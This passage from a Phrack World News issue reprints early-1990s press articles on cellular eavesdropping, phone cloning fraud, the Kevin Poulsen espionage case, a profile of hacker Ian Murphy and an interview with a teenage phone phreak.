  4892. electronic eavesdropping is "substantial," said Thomas S. Birney III, president
  4893. of Cellular Security Group, a Massachusetts-based consulting group.
  4894.  
  4895. Air Force One and other military and government aircraft have secure satellite
  4896. phone links for sensitive conversations with the ground, but because these are
  4897. expensive to use and sometimes not operating, some calls travel over open
  4898. frequencies.  Specific frequencies, such as those used by the president's
  4899. plane, are publicly available and are often listed in "scanners" publications
  4900. and computer bulletin boards.
  4901.  
  4902. Bush, for example, was accidentally overheard by a newspaper reporter in 1990
  4903. while talking about the buildup prior to the Persian Gulf War with Senator
  4904. Robert Byrd (D-W.Va.).  The reporter, from the Daily Times in Gloucester,
  4905. Massachusetts quickly began taking notes and the next day, quoted Bush in his
  4906. story under the headline, "Bush Graces City Airspace."
  4907.  
  4908. The vice president's chief of staff, William Kristol, was overheard castigating
  4909. one staff aide as a "jerk" for trying to reach him at home.
  4910.  
  4911. Some eavesdroppers may be stepping over the legal line, particularly if they
  4912. tape record such conversations.
  4913.  
  4914. The Electronic Communications Privacy Act prohibits intentional monitoring,
  4915. taping or distribution of the content of most electronic, wire or private oral
  4916. communications.  Cellular phone calls are explicitly protected under this act.
  4917. Local laws often also prohibit such activity.  However, some lawyers said that
  4918. under federal law, it is legal to intercept cordless telephone conversations as
  4919. well as conversations on an open radio channel.
  4920.  
  4921. The government rarely prosecutes such cases because such eavesdroppers are
  4922. difficult to catch.  Not only that, it is hard to win convictions against
  4923. "listening Toms," lawyers said, because prosecutors must prove the
  4924. eavesdropping was intentional.
  4925.  
  4926. "Unless they prove intent they are not going to win," said Frank Terranella,
  4927. general counsel for the Association of North American Radio Clubs in Clifton,
  4928. New Jersey.  "It's a very tough prosecution for them."
  4929.  
  4930. To help curb eavesdropping, the House has passed a measure sponsored by Rep.
  4931. Edward J. Markey (D-Mass.), chairman of the House telecommunications and
  4932. finance subcommittee, that would require the Federal Communications Commission
  4933. to outlaw any scanner that could receive cellular frequencies.  The bill has
  4934. been sent to the Senate.
  4935.  
  4936. But there are about 10 million scanners in use, industry experts report, and
  4937. this year sales of scanners and related equipment such as antennas will top
  4938. $100 million.
  4939.  
  4940. Dedicated scanners, who collect the phone calls of high-ranking government
  4941. officials the way kids collect baseball cards, assemble basements full of
  4942. electronic gear.
  4943.  
  4944. In one sense, the electronic eavesdroppers are advanced versions of the
  4945. ambulance chasers who monitor police and fire calls with simpler scanning
  4946. equipment and then race to the scene of blazes and accidents for a close look. 
  4947. But they also have kinship with the computer hackers who toil at breaking into
  4948. complex computer systems and rummaging around other's files and software
  4949. programs.
  4950.  
  4951. One New England eavesdropper has four scanners, each one connected to its own
  4952. computer, with a variety of frequencies programmed.  When a conversation
  4953. appears on a pre-selected frequency, a computer automatically locks in on the
  4954. frequency to capture it.  He also keeps a scanner in his car, for entertainment
  4955. along the road.
  4956.  
  4957. He justifies his avocation with a seemingly tortured logic.  "I'm not going out
  4958. and stealing these signals," he said.  "They're coming into my home, right
  4959. through my windows."
  4960. _______________________________________________________________________________
  4961.  
  4962.  Why Cybercrooks Love Cellular                                December 21, 1989
  4963.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4964.  by William G. Flanagan and Brigid McMenamin (Forbes)(Page 189)
  4965.  
  4966. Cellular phones provide cybercrooks with golden opportunities for telephone
  4967. toll fraud, as many shocked cellular customers are discovering.  For example,
  4968. one US West Cellular customer in Albuquerque recently received a hefty
  4969. telephone bill.
  4970.  
  4971. Total: $20,000.
  4972.  
  4973. Customers are not held responsible when their phone numbers are ripped off and
  4974. misused.  But you may be forced to have your cellular phone number changed. 
  4975. The cellular carriers are the big losers -- to the tune of an estimated $300
  4976. million per year in unauthorized calls.
  4977.  
  4978. How do the crooks get the numbers?  There are two common methods: cloning and
  4979. tumbling.
  4980.  
  4981. Each cellular phone has two numbers -- a mobile identification number (MIN) and
  4982. an electronic serial number (ESN).  Every time you make a call, the chip
  4983. transmits both numbers to the local switching office for verification and
  4984. billing.
  4985.  
  4986. Cloning involves altering the microchip in another cellular phone so that both
  4987. the MIN and ESN numbers match those stolen from a bona fide customer.  The
  4988. altering can be done with a personal computer. The MIN and ESN numbers are
  4989. either purchased from insiders or plucked from the airwaves with a legal
  4990. device, about the size of a textbook, that can be plugged into a vehicle's
  4991. cigarette lighter receptacle.
  4992.  
  4993. Cellular companies are starting to watch for suspicious calling patterns.  But
  4994. the cloning may not be detected until the customer gets his bill.
  4995.  
  4996. The second method -- tumbling -- also involves using a personal computer to
  4997. alter a microchip in a cellular phone so that its numbers change after every
  4998. phone call.  Tumbling doesn't require any signal plucking.  It takes advantage
  4999. of the fact that cellular companies allow "roaming" -- letting you make calls
  5000. away from your home area.
  5001.  
  5002. When you use a cellular phone far from your home base, it may take too long for
  5003. the local switching office to verify your MIN and ESN numbers.  So the first
  5004. call usually goes through while the verification goes on.  If the numbers are
  5005. invalid, no more calls will be permitted by that office on that phone.
  5006.  
  5007. In 1987 a California hacker figured out how to use his personal computer to
  5008. reprogram the chip in a cellular phone.  Authorities say one of his pals
  5009. started selling altered chips and chipped-up phones.  Other hackers figured out
  5010. how to make the chips generate new, fake ESN numbers every time the cellular
  5011. phone was used, thereby short-circuiting the verification process.  By 1991
  5012. chipped-up, tumbling ESN phones were in use all over the U.S.
  5013.  
  5014. The cellular carriers hope to scotch the problem of tumbling with instant
  5015. verification.  But that won't stop the clones.
  5016.  
  5017. How do crooks cash in?  Drug dealers buy (for up to $ 3,200) or lease (about
  5018. $750 per day) cellular phones with altered chips.  So do the "call-sell"
  5019. crooks, who retail long distance calls to immigrants often for less than phone
  5020. companies charge.  That's why a victim will get bills for calls all over the
  5021. world, but especially to Colombia, Bolivia and other drug-exporting countries.
  5022. _______________________________________________________________________________
  5023.  
  5024.                                 ==Phrack Inc.==
  5025.  
  5026.                   Volume Four, Issue Forty-One, File 12 of 13
  5027.  
  5028.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  5029.               PWN                                             PWN
  5030.               PWN              Phrack World News              PWN
  5031.               PWN                                             PWN
  5032.               PWN           Issue 41 / Part 2 of 3            PWN
  5033.               PWN                                             PWN
  5034.               PWN        Compiled by Datastream Cowboy        PWN
  5035.               PWN                                             PWN
  5036.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  5037.  
  5038.  
  5039.  Government Cracks Down On Hacker                              November 2, 1992
  5040.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5041.  by Donald Clark (The San Francisco Chronicle)(Page C1)
  5042.  
  5043.          "Civil Libertarians Take Keen Interest In Kevin Poulsen Case"
  5044.  
  5045. Breaking new ground in the war on computer crime, the Justice Department plans
  5046. to accuse Silicon Valley's most notorious hacker of espionage.
  5047.  
  5048. Kevin Lee Poulsen, 27, touched off a 17-month manhunt before being arrested on
  5049. charges of telecommunications and computer fraud in April 1991.  A federal
  5050. grand jury soon will be asked to issue a new indictment charging Poulsen with
  5051. violating a law against willfully sharing classified information with
  5052. unauthorized persons, assistant U.S. attorney Robert Crowe confirmed.
  5053.  
  5054. A 1988 search of Poulsen's Menlo Park storage locker uncovered a set of secret
  5055. orders from a military exercise, plus evidence that Poulsen may have tried to
  5056. log onto an Army data network and eavesdropped on a confidential investigation
  5057. of former Philippine President Ferdinand Marcos.  It is not clear whether the
  5058. new charge stems from these or other acts.
  5059.  
  5060. Poulsen did not hand secrets to a foreign power, a more serious crime, Crowe
  5061. noted.  But by using an espionage statute against a U.S. hacker for the first
  5062. time, prosecutors raise the odds of a record jail sentence that could be used
  5063. to deter other electronic break-ins.
  5064.  
  5065. They could use a stronger deterrent.  Using personal computers connected to
  5066. telephone lines, cadres of so-called cyberpunks have made a sport of tapping
  5067. into confidential databases and voicemail systems at government agencies and
  5068. corporations.  Though there is no reliable way to tally the damage, a 1989
  5069. survey indicated that computer crimes may cost U.S. business $500 million a
  5070. year, according to the Santa Cruz-based National Center for Computer Crime
  5071. Data.
  5072.  
  5073. Telephone companies, whose computers and switching systems have long been among
  5074. hackers' most inviting targets, are among those most anxious to tighten
  5075. security.  Poulsen allegedly roamed at will through the networks of Pacific
  5076. Bell, for example, changing records and even intercepting calls between Pac
  5077. Bell security personnel who were on his trail.
  5078.  
  5079. The San Francisco-based utility has been intimately involved in his
  5080. prosecution; Poulsen was actually captured in part because one of the company's
  5081. investigators staked out a suburban Los Angeles supermarket where the fugitive
  5082. shopped.
  5083.  
  5084. "Virtually everything we do these days is done in a computer --your credit
  5085. cards, your phone bills," said Kurt von Brauch, a Pac Bell security officer who
  5086. tracked Poulsen, in an interview last year. "He had the knowledge to go in
  5087. there and alter them."
  5088.  
  5089.  
  5090. BROAD LEGAL IMPACT
  5091.  
  5092. Poulsen's case could have broad impact because of several controversial legal
  5093. issues involved.  Some civil libertarians, for example, question the Justice
  5094. Department's use of the espionage statute, which carries a maximum 10-year
  5095. penalty and is treated severely under federal sentencing guidelines.  They
  5096. doubt the law matches the actions of Poulsen, who seems to have been motivated
  5097. more by curiosity than any desire to hurt national security.
  5098.  
  5099. "Everything we know about this guy is that he was hacking around systems for
  5100. his own purposes," said Mike Godwin, staff counsel for the Electronic Frontier
  5101. Foundation, a public-interest group that has tracked Poulsen's prosecution.  He
  5102. termed the attempt to use the statute against Poulsen "brain-damaged."
  5103.  
  5104. Poulsen, now in federal prison in Pleasanton, has already served 18 months in
  5105. jail without being tried for a crime, much less convicted.  Though federal
  5106. rules are supposed to ensure a speedy trial, federal judges can grant extended
  5107. time to allow pretrial preparation in cases of complex evidence or novel legal
  5108. issues.
  5109.  
  5110. Both are involved here.  After he fled to Los Angeles to avoid prosecution,
  5111. for example, Poulsen used a special scrambling scheme on one computer to make
  5112. his data files unintelligible to others.  It has taken months to decode that
  5113. data, and the job isn't done yet, Crowe said.  That PC was only found because
  5114. authorities intercepted one of Poulsen's phone conversations from jail, other
  5115. sources said.
  5116.  
  5117.  
  5118. CHARGES LABELED ABSURD
  5119.  
  5120. Poulsen declined requests for interviews.  His attorney, Paul Meltzer, terms
  5121. the espionage charge absurd.  He is also mounting several unusual attacks on
  5122. parts of the government's original indictment against Poulsen, filed in 1989.
  5123.  
  5124. He complains, for example, that the entire defense team is being subjected to
  5125. 15-year background checks to obtain security clearances before key documents
  5126. can be examined.
  5127.  
  5128. "The legal issues are fascinating," Meltzer said. "The court will be forced to
  5129. make law."
  5130.  
  5131. Poulsen's enthusiasm for exploring forbidden computer systems became known to
  5132. authorities in 1983.  The 17-year-old North Hollywood resident, then using the
  5133. handle Dark Dante, allegedly teamed up with an older hacker to break into
  5134. ARPAnet, a Pentagon-organized computer network that links researchers and
  5135. defense contractors around the country. He was not charged with a crime because
  5136. of his age.
  5137.  
  5138. Despite those exploits, Poulsen was later hired by SRI International, a Menlo
  5139. Park-based think tank and government contractor, and given an assistant
  5140. programming job with a security clearance.  Though SRI won't comment, one
  5141. source said Poulsen's job involved testing whether a public data network, by
  5142. means of scrambling devices, could be used to confidentially link classified
  5143. government networks.
  5144.  
  5145. But Poulsen apparently had other sidelines.  Between 1985 and 1988, the Justice
  5146. Department charges, Poulsen burglarized or used phony identification to sneak
  5147. into several Bay Area phone company offices to steal equipment and confidential
  5148. access codes that helped him monitor calls and change records in Pac Bell
  5149. computers, prosecutors say.
  5150.  
  5151.  
  5152. CACHE OF PHONE GEAR
  5153.  
  5154. The alleged activities came to light because Poulsen did not pay a bill at the
  5155. Menlo/Atherton Storage Facility.  The owner snipped off a padlock on a storage
  5156. locker and found an extraordinary cache of telephone paraphernalia.  A 19-count
  5157. indictment, which also named two of Poulsen's associates, included charges of
  5158. theft of government property, possession of wire-tapping devices and phony
  5159. identification.
  5160.  
  5161. One of Poulsen's alleged accomplices, Robert Gilligan, last year pleaded guilty
  5162. to one charge of illegally obtaining Pac Bell access codes.  Under a plea
  5163. bargain, Gilligan received three years of probation, a $25,000 fine, and agreed
  5164. to help authorities in the Poulsen prosecution.  Poulsen's former roommate,
  5165. Mark Lottor, is still awaiting trial.
  5166.  
  5167. A key issue in Poulsen's case concerns CPX Caber Dragon, a code name for a
  5168. military exercise in Fort Bragg, North Carolina.  In late 1987 or early 1988,
  5169. the government charges, Poulsen illegally obtained classified orders for the
  5170. exercise.  But Meltzer insists that the orders had been declassified by the
  5171. time they were seized, and were reclassified after the fact to prosecute
  5172. Poulsen.  Crowe said Meltzer has his facts wrong. "That's the same as saying
  5173. we're framing Poulsen," Crowe said. "That's the worst sort of accusation I can
  5174. imagine."
  5175.  
  5176. Another dispute focuses on the charge of unauthorized access to government
  5177. computers.  FBI agents found an electronic copy of the banner that a computer
  5178. user sees on first dialing up an Army network called MASNET, which includes a
  5179. warning against unauthorized use of the computer system.  Meltzer says Poulsen
  5180. never got beyond this computer equivalent of a "No Trespassing" sign.
  5181.  
  5182. Furthermore, Meltzer argues that the law is unconstitutional because it does
  5183. not sufficiently define whether merely dialing up a computer qualifies as
  5184. illegal "access."
  5185.  
  5186. Meltzer also denies that Poulsen could eavesdrop on calls.  The indictment
  5187. accuses him of illegally owning a device called a direct access test unit,
  5188. which it says is "primarily useful" for surreptitiously intercepting
  5189. communications.  But Meltzer cites an equipment manual showing that the system
  5190. is specifically designed to garble conversations, though it allows phone
  5191. company technicians to tell that a line is in use.
  5192.  
  5193. Crowe said he will soon file written rebuttals to Meltzer's motions.  In
  5194. addition to the new indictment he is seeking, federal prosecutors in Los
  5195. Angeles are believed to be investigating Poulsen's activities while a fugitive. 
  5196. Among other things, Poulsen reportedly taunted FBI agents on computer bulletin
  5197. boards frequented by hackers.
  5198.  
  5199.  
  5200. PHONE COMPANIES WORRIED
  5201.  
  5202. Poulsen's prosecution is important to the government -- and phone companies --
  5203. because of their mixed record so far in getting convictions in hacker cases.
  5204.  
  5205. In one of the most embarrassing stumbles, a 19-year-old University of Missouri
  5206. student named Craig Neidorf was indicted in February 1990 on felony charges for
  5207. publishing a memorandum on the emergency 911 system of Bell South.  The case
  5208. collapsed when the phone company information -- which the government said was
  5209. worth $79,940 -- was shown by the defense to be available from another Bell
  5210. system for just $13.50.
  5211.  
  5212. Author Bruce Sterling, whose "The Hacker Crackdown" surveys recent high-tech
  5213. crime and punishment, thinks the phone company overstates the dangers from
  5214. young hackers.  On the other hand, a Toronto high school student electronically
  5215. tampered with that city's emergency telephone dispatching system and was
  5216. arrested, he noted.
  5217.  
  5218. Because systems that affect public safety are involved, law enforcement
  5219. officials are particularly anxious to win convictions and long jail sentences
  5220. for the likes of Poulsen.
  5221.  
  5222. "It's very bad when the government goes out on a case and loses," said one
  5223. computer-security expert who asked not to be identified.  "They are desperately
  5224. trying to find something to hang him on."
  5225.  
  5226. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5227.  
  5228.  Computer Hacker Charged With Stealing Military Secrets        December 8, 1992
  5229.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5230.  Taken from the Associated Press
  5231.  
  5232. SAN FRANCISCO -- A computer hacker has been charged with stealing Air Force
  5233. secrets that allegedly included a list of planned targets in a hypothetical
  5234. war.
  5235.  
  5236. Former Silicon Valley computer whiz Kevin Poulsen, who was accused in the early
  5237. 1980s as part of a major hacking case, was named in a 14-count indictment
  5238. issued Monday.
  5239.  
  5240. He and an alleged accomplice already face lesser charges of unlawful use of
  5241. telephone access devices, illegal wiretapping and conspiracy.
  5242.  
  5243. Poulsen, 27, of Los Angeles, faces 7-to-10 years in prison if convicted of the
  5244. new charge of gathering defense information, double the sentence he faced
  5245. previously.
  5246.  
  5247. His lawyer, Paul Meltzer, says the information was not militarily sensitive and
  5248. that it was reclassified by government officials just so they could prosecute
  5249. Poulsen on a greater charge.
  5250.  
  5251. A judge is scheduled to rule February 1 on Meltzer's motion to dismiss the
  5252. charge.
  5253.  
  5254. In the early 1980s, Poulsen and another hacker going by the monicker Dark Dante
  5255. were accused of breaking into UCLA's computer network in one of the first
  5256. prosecutions of computer hacking.
  5257.  
  5258. He escaped prosecution because he was then a juvenile and went to work at Sun
  5259. Microsystems in Mountain View.
  5260.  
  5261. While working for Sun, Poulsen illegally obtained a computer tape containing a
  5262. 1987 order concerning a military exercise code-named Caber Dragon 88, the
  5263. government said in court papers.  The order is classified secret and contains
  5264. names of military targets, the government said.
  5265.  
  5266. In 1989, Poulsen and two other men were charged with stealing telephone access
  5267. codes from a Pacific Bell office, accessing Pacific Bell computers, obtaining
  5268. unpublished phone numbers for the Soviet Consulate in San Francisco; dealing in
  5269. stolen telephone access codes; and eavesdropping on two telephone company
  5270. investigators.
  5271.  
  5272. Poulsen remained at large until a television show elicited a tip that led to
  5273. his capture in April 1991.
  5274.  
  5275. He and Mark Lottor, 27, of Menlo Park, are scheduled to be tried in March.  The
  5276. third defendant, Robert Gilligan, has pleaded guilty and agreed to pay Pacific
  5277. Bell $25,000.  He is scheduled to testify against Lottor and Poulsen as part of
  5278. a plea bargain.
  5279.  
  5280. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5281.  
  5282.  CA Computer Whiz Is First Hacker Charged With Espionage      December 10, 1992
  5283.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5284.  by John Enders (The Associated Press)
  5285.  
  5286. SAN JOSE, California -- A 28-year-old computer whiz who reportedly once tested
  5287. Department of Defense security procedures has become the first alleged computer
  5288. hacker to be charged with espionage.
  5289.  
  5290. The government says Kevin Lee Poulsen stole classified military secrets and
  5291. should go to prison.  But his lawyer calls him "an intellectually curious
  5292. computer nerd."
  5293.  
  5294. Poulsen, of Menlo Park, California, worked in the mid-1980s as a consultant
  5295. testing Pentagon computer security.  Because of prosecution delays, he was held
  5296. without bail in a San Jose jail for 20 months before being charged this week.
  5297.  
  5298. His attorney, Paul Meltzer, says that Poulsen did not knowingly possess
  5299. classified information.  The military information had been declassified by the
  5300. time prosecutors say Poulsen obtained it, Meltzer said.
  5301.  
  5302. "They are attempting to make him look like Julius Rosenberg," Meltzer said of
  5303. the man executed in 1953 for passing nuclear-bomb secrets to the Soviet Union. 
  5304. "It's just ridiculous."
  5305.  
  5306. Poulsen was arrested in 1988 on lesser but related hacking charges. He
  5307. disappeared before he was indicted and was re-arrested in Los Angeles in April
  5308. 1991.  Under an amended indictment, he was charged with illegal possession of
  5309. classified government secrets.
  5310.  
  5311. Poulsen also is charged with 13 additional counts, including eavesdropping on
  5312. private telephone conversations and stealing telephone company equipment.
  5313.  
  5314. If convicted on all counts, he faces up to 85 years in prison and fines
  5315. totaling $3.5 million, said Assistant U.S. Attorney Robert Crowe in San
  5316. Francisco.
  5317.  
  5318. On Monday (12/7), Poulsen pleaded innocent to all charges.  He was handed over
  5319. to U.S. Marshals in San Jose on Wednesday (12/9) and was being held at a
  5320. federal center in Pleasanton near San Francisco.
  5321.  
  5322. He hasn't been available for comment, but in an earlier letter from prison,
  5323. Poulsen called the charges "ludicrous" and said the government is taking
  5324. computer hacking too seriously.
  5325.  
  5326. U.S. Attorney John A. Mendez said Wednesday (12/9) that Poulsen is not
  5327. suspected of turning any classified or non-classified information over to a
  5328. foreign power, but he said Poulsen's alleged activities are being taken very
  5329. seriously.
  5330.  
  5331. "He's unique.  He's the first computer hacker charged with this type of
  5332. violation -- unlawful gathering of defense information," Mendez said.
  5333.  
  5334. Assistant U.S. Attorney Robert Crowe said the espionage charge was entered only
  5335. after approval from the Justice Department's internal security section in
  5336. Washington.
  5337.  
  5338. The indictment alleges that Poulsen:
  5339.  
  5340. - Tapped into the Pacific Bell Co.'s computer and collected unpublished
  5341.   telephone numbers and employee lists for the Soviet Consulate in San
  5342.   Francisco.
  5343.  
  5344. - Stole expensive telephone switching and other equipment.
  5345.  
  5346. - Retrieved records of phone company security personnel and checked records of
  5347.   their own calls to see if they were following him.
  5348.  
  5349. - Eavesdropped on telephone calls and computer electronic mail between phone
  5350.   company investigators and some of his acquaintances.
  5351.  
  5352. - Tapped into an unclassified military computer network known as Masnet.
  5353.  
  5354. - Obtained a classified document on flight orders for a military exercise
  5355.   involving thousands of paratroopers at the Army's Fort Bragg in North
  5356.   Carolina.
  5357.  
  5358. The offenses allegedly took place between 1986 and 1988.
  5359.  
  5360. In 1985, the Palo Alto, California, think tank SRI International hired Poulsen
  5361. to work on military contracts, including a sensitive experiment to test
  5362. Pentagon computer security, according to published reports.  SRI has declined
  5363. to comment on the case.
  5364. _______________________________________________________________________________
  5365.  
  5366.  Hacker For Hire                                               October 19, 1992
  5367.  ~~~~~~~~~~~~~~~
  5368.  by Mark Goodman and Allison Lynn (People)(Page 151)
  5369.  
  5370.         "Real-life Sneaker Ian Murphy puts the byte on corporate spies."
  5371.  
  5372. THERE'S NO PRIVACY THESE DAYS," says Ian Murphy.  "Just imagine going into GM's
  5373. or IBM's accounts and wiping them out.  You can bring about economic collapse
  5374. by dropping in a virus without them even knowing it."  Scoff at your peril,
  5375. Corporate America.  Captain Zap -- as Murphy is known in the electronic
  5376. underworld of computer hackers -- claims there's no computer system he can't
  5377. crack, and hence no mechanical mischief he can't wreak on corporations or
  5378. governments.  And Murphy, 35, has the track record -- not to mention the
  5379. criminal record -- to back up his boasts.
  5380.  
  5381. Murphy's fame in his subterranean world is such that he worked as a consultant
  5382. for Sneakers, the hit film about a gang of computer-driven spies (Robert
  5383. Redford, Sidney Poitier, Dan Aykroyd) lured into doing some high-risk
  5384. undercover work for what they believe is the National Security Agency.
  5385.  
  5386. Murphy loved the way the movie turned out.  "It's like a training film for
  5387. hackers," he says, adding that he saw much of himself in the Aykroyd character,
  5388. a pudgy, paranoid fantasist named Mother who, like Murphy, plows through
  5389. people's trash for clues.  In fact when Aykroyd walked onscreen covered with
  5390. trash, Murphy recalls, "My friends turned to me and said, 'Wow, that's you!'" 
  5391. If that sounds like a nerd's fantasy, then check out Captain Zap's credentials.
  5392. Among the first Americans to be convicted of a crime involving  computer break-
  5393. ins, he served only some easy community-service time in 1983 before heading
  5394. down the semistraight, not necessarily narrow, path of a corporate spy.
  5395.  
  5396. Today, Murphy, 35, is president of IAM Secure Data Systems, a security
  5397. consultant group he formed in 1982.  For a fee of $5,000 a day plus expenses,
  5398. Murphy has dressed up as a phone-company employee and cracked a bank's security
  5399. system, he has aided a murder investigation for a drug dealer's court defense,
  5400. and he has conducted a terrorism study for a major airline.  His specialty,
  5401. though, is breaking into company security systems -- an expertise he applied
  5402. illegally in his outlaw hacker days and now, legally, by helping companies
  5403. guard against such potential break-ins.  Much of his work lately, he says,
  5404. involves countersurveillance -- that is, finding out if a corporation's
  5405. competitors are searching its computer systems for useful information.  "It's
  5406. industrial spying," Murphy says, "and it's happening all over the place."
  5407.  
  5408. Murphy came by his cloak-and-daggerish calling early.  He grew up in Gladwyne,
  5409. Pennsylvania, on Philadelphia's Main Line, the son of Daniel Murphy, a retired
  5410. owner of a stevedoring business, and his wife, Mary Ann, an advertising
  5411. executive.  Ian recalls, "As a kid, I was bored.  In science I did wonderfully.
  5412. The rest of it sucked.  And social skills weren't my thing."
  5413.  
  5414. Neither was college.  Ian had already begun playing around with computers at
  5415. Archbishop Carroll High School; after graduation he joined the Navy.  He got an
  5416. early discharge in 1975 when the Navy didn't assign him to radio school as
  5417. promised, and he returned home to start hacking with a few pals.  In his
  5418. heyday, he claims, he broke into White House and Pentagon computers.  "In the
  5419. Pentagon," he says, "we were playing in the missile department, finding out
  5420. about the new little toys they were developing and trying to mess with their
  5421. information. None of our break-ins had major consequences, but it woke them the
  5422. hell up because they [had] all claimed it couldn't be done."
  5423.  
  5424. Major consequences came later.  Murphy and his buddies created dummy
  5425. corporations with Triple-A credit ratings and ordered thousands of dollars'
  5426. worth of computer equipment.  Two years later the authorities knocked at
  5427. Murphy's door.  His mother listened politely to the charges, then earnestly
  5428. replied, "You have the wrong person.  He doesn't know anything about
  5429. computers."
  5430.  
  5431. Right.  Murphy was arrested and convicted of receiving stolen property in 1982.
  5432. But because there were no federal computer-crime laws at that time, he got off
  5433. with a third-degree felony count.  He was fined $1,000, ordered to provide
  5434. 1,000 hours of community service (he worked in a homeless shelter) and placed
  5435. on probation for 2 1/2 years.  "I got off easy," he concedes.
  5436.  
  5437. Too easy, by his own mother's standards.  A past president of Republican Women
  5438. of the Main Line, Mary Ann sought out her Congressman, Larry Coughlin, and put
  5439. the question to him: "How would you like it if the next time you ran for
  5440. office, some young person decided he was going to change all of your files?" 
  5441. Coughlin decided he wouldn't like it and raised the issue on the floor of
  5442. Congress in 1983.  The following year, Congress passed a national computer-
  5443. crime law, making it illegal to use a computer in a manner not authorized by
  5444. the owner.
  5445.  
  5446. Meanwhile, Murphy, divorced in 1977 after a brief marriage, had married Carol
  5447. Adrienne, a documentary film producer, in 1982.  Marriage evidently helped set
  5448. Murphy straight, and he formed his company -- now with a staff of 12 that
  5449. includes a bomb expert and a hostage expert.  Countersurveillance has been
  5450. profitable (he's making more than $250,000 a year and is moving out of his
  5451. parents' house), but it has left him little time to work on his social skills -
  5452. - or for that matter his health.  At 5 ft.6 in. and 180 lbs., wearing jeans,
  5453. sneakers and a baseball cap, Murphy looks like a Hollywood notion of himself.
  5454. He has suffered four heart attacks since 1986 but unregenerately smokes a pack
  5455. of cigarettes a day and drinks Scotch long before the sun falls over the
  5456. yardarm.
  5457.  
  5458. He and Carol divorced in April 1991, after 10 years of marriage.  "She got
  5459. ethics and didn't like the work I did," he says.  These days Murphy dates --
  5460. but not until he thoroughly "checks" the women he goes out with.  "I want to
  5461. know who I'm dealing with because I could be dealing with plants," he explains. 
  5462. "The Secret Service plays games with hackers."
  5463.  
  5464. Murphy does retain a code of honor.  He will work for corporations, helping to
  5465. keep down the corporate crime rate, he says, but he won't help gather evidence
  5466. to prosecute fellow hackers.  Indeed his rogue image makes it prudent for him
  5467. to stay in the background.  Says Reginald Branham, 23, president of Cyberlock
  5468. Consulting, with whom Murphy recently developed a comprehensive antiviral
  5469. system: "I prefer not to take Ian to meetings with CEOs.  They're going to
  5470. listen to him and say, 'This guy is going to tear us apart.'"  And yet Captain
  5471. Zap, for all his errant ways, maintains a certain peculiar charm.  "I'm like
  5472. the Darth Vader of the computer world," he insists.  "In the end I turn out to
  5473. be the good guy."
  5474.  
  5475. (Photograph 1 = Ian Murphy)
  5476. (Photograph 2 = River Phoenix, Robert Redford, Dan Aykroyd, and Sidney Poitier)
  5477. (Photograph 3 = Mary Ann Murphy <Ian's mom>)
  5478. _______________________________________________________________________________
  5479.  
  5480.  Yacking With A Hack                                                August 1992
  5481.  ~~~~~~~~~~~~~~~~~~~
  5482.  by Barbara Herman (Teleconnect)(Page 60)
  5483.  
  5484.                  "Phone phreaking for fun, profit & politics."
  5485.  
  5486. Ed is an intelligent, articulate 18 year old.  He's also a hacker, a self-
  5487. professed "phreak" -- the term that's developed in a subculture of usually
  5488. young, middle-class computer whizzes.
  5489.  
  5490. I called him at his favorite phone booth.
  5491.  
  5492. Although he explained how he hacks as well as what kinds of hacking he has been
  5493. involved in, I was especially interested in why he hacks.
  5494.  
  5495. First off, Ed wanted to make it clear he doesn't consider himself a
  5496. "professional" who's in it only for the money.  He kept emphasizing that
  5497. "hacking is not only an action, it's a state of mind."
  5498.  
  5499. Phreaks even have an acronym-based motto that hints at their overblown opinions
  5500. of themselves.  PHAC.  It describes what they do: "phreaking," "hacking,"
  5501. "anarchy" and "carding."  In other words, they get into systems over the
  5502. telecom network (phreaking), gain access (hacking), disrupt the systems
  5503. (political anarchy) and use peoples' calling/credit cards for their personal
  5504. use.
  5505.  
  5506. Throughout our talk, Ed showed no remorse for hacking.  Actually, he had
  5507. contempt for those he hacked.  Companies were "stupid" because their systems'
  5508. were so easy to crack.  They deserved it.
  5509.  
  5510. As if they should have been thankful for his mercy, he asked me to imagine what
  5511. would have happened if he really hacked one railway company's system (he merely
  5512. left a warning note), changing schedules and causing trains to collide.
  5513.  
  5514. He also had a lot of disgust for the "system," which apparently includes big
  5515. business (he is especially venomous toward AT&T), government, the FBI, known as
  5516. "the Gestapo" in phreak circles, and the secret service, whose "intelligence
  5517. reflects what their real jobs should be, secret service station attendants."
  5518.  
  5519. He doesn't really believe any one is losing money on remote access toll fraud.
  5520.  
  5521. He figures the carriers are angry not about money lost but rather hypothetical
  5522. money, the money they could have charged for the free calls the hackers made,
  5523. which he thinks are overpriced to begin with.
  5524.  
  5525. He's also convinced (wrongly) that companies usually don't foot the bill for
  5526. the free calls hackers rack up on their phone systems.  "And, besides, if some
  5527. multi-million dollar corporation has to pay, I'm certainly not going to cry for
  5528. them."
  5529.  
  5530. I know.  A twisted kid.  Weird.  But besides his skewed ethics, there's also a
  5531. bunch of contradictions.
  5532.  
  5533. He has scorn for companies who can't keep him out, even though he piously warns
  5534. them to try.
  5535.  
  5536. He dismisses my suggestion that the "little guy" is in fact paying the bills
  5537. instead of the carrier.  And yet he says AT&T is overcharging them for the
  5538. "vital" right to communicate with each other.
  5539.  
  5540. He also contradicted his stance of being for the underdog by calling the
  5541. railway company "stupid" for not being more careful with their information.
  5542.  
  5543. Maybe a railway company is not necessarily the "little guy," but it hardly
  5544. seems deserving of the insults Ed hurled at it.  When I mentioned that a
  5545. hospital in New York was taken for $100,000 by hackers, he defended the hackers
  5546. by irrelevantly making the claim that doctors easily make $100,000 a year. 
  5547. Since when did doctors pay hospital phone bills?
  5548.  
  5549. What Ed is good at is rationalizing.  He lessens his crimes by raising them to
  5550. the status of political statements, and yet in the same breath, for example, he
  5551. talks about getting insider info on the stock market and investing once he
  5552. knows how the stock is doing.  He knows it's morally wrong, he told me, but
  5553. urged me to examine this society that "believes in making a buck any way you
  5554. can.  It's not a moral society."
  5555.  
  5556. Amazingly enough, the hacker society to which Ed belongs, if I can
